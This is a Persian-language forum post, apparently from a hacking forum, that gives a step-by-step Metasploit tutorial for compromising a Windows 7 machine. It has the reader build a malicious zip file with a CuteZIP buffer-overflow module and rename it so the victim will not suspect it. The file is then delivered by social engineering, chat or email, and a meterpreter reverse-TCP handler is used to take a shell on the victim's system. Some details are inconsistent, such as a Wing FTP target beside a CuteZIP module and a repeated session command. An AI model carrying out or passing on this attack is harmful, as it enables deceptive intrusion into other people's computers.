[font=\'Comic Sans MS\']در این نوع حمله ما با استفاده از متااسپلویت اقدام به ایجاد یک فایل ورد با پسوند zip میکنیم و سپس این فایل رو از طرق مختلف مثل ( مهندسی اجتماعی – چت – ایمیل و . . . ) به تارگت میدهیم .
بعد از اجرا و باز کردن فایل توسط تاگت ما موتوانیم از سیستم قربانی دسترسی بگیریم .
خوب بریم سراغ اموزش اصلی :
تارکت :Wing FTP 4.3.8
سیستم عامل حمله : کالی لینوکس یا بک ترک5
سیستم عامل تارگت : ویندوز 7
گام اول :در ابتدا وارد بک ترک بشید و یه ترمینال جدید باز کنید و دستور
کد HTML:
Msfconsole
رو بنویسید و اینتر کنید ( البته میتونید از Armitage هم استفاده کنید . تفاوتی نداره ) .
گام دوم : حالا با استفاده از دستور use
کد HTML:
exploit/windows/fileformat/cutezip_bof
وارد محیط اکسپلویت بشید .
گام سوم : در اینجا کافیه یه show options بگیرید تا بهتون بگه چه مقادیری رو باید ست کنید
گام چهارم : مقادیر زیر را عینا ست کنید در صورت اینکه مثلا مشکل پیش اومد خودتون بنویسید
در اینجا ایپی 192.168.1.2 همون ایپی **ر یا ایپی خودتون هست که باید جایگزین کنید .
گام پنجم : بعد از اکسپلویت یک فایل با پسوند zip و نام msf در شاخه زیر ایجا میشود که باید این فایل رو تغییر نام بدید تا تارگت شک نکنه و متوجه حمله ما نشود .
کد HTML:
/root/.msf4/local/msf.zip
و باعد با استفاده از دستورات زیر کامپیوتر خودمون رو اماده گرفتن اکسس از تارگت میکنیم . یه چیزی تو مایه های گوش ایستادن .
کد HTML:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit
در اخر هم فایل ایجاد شده در مرحله قبل را به هر طریقی که شده به تارگت میدیم تا اجرا کنه . ( چت – مهندسی اجتماعی – ایمیل و . . . ) . به محض باز کردن فایل توسط تارگت ما از سیستم تارگت شل میگیریم و میتونیم برای مرحله بعد حمله خودمون رو اماده کنیم .
برای دسترسی به شل هم کافیه یک بار دستور Sessions -l رو وارد کنید . اگر شل گرفته باشید برای شما نشون میده . که یک ایدی هم داره سپس درستور Sessions -l رو به همراه ایدی وارد کنید تا به شل تارگت وصل بشید . به ایین ترتیب:
[font=\'Comic Sans MS\']sessions -i ID
امضاي کاربر :
تشکر شده:
2 کاربر از danyal_pishro به خاطر اين مطلب مفيد تشکر کرده اند:
mattin / whatyouknow /